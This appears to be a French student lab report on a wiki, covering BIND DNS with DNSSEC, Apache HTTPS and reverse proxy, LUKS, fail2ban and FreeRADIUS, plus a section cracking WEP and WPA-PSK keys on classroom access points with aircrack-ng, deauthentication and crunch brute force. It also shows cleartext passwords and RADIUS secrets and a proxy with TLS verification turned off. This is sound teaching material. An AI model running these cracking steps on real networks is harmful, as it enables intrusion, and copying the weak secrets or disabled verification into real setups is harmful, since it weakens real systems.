&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
[[Fichier:Wpa-wps.png|vignette]]&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^(?:view (?:internal|external): )?query(?: \(cache\))?&lt;br /&gt;
            ^zone transfer&lt;br /&gt;
            ^bad zone transfer request: '\S+/IN': non-authoritative zone&lt;br /&gt;
&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
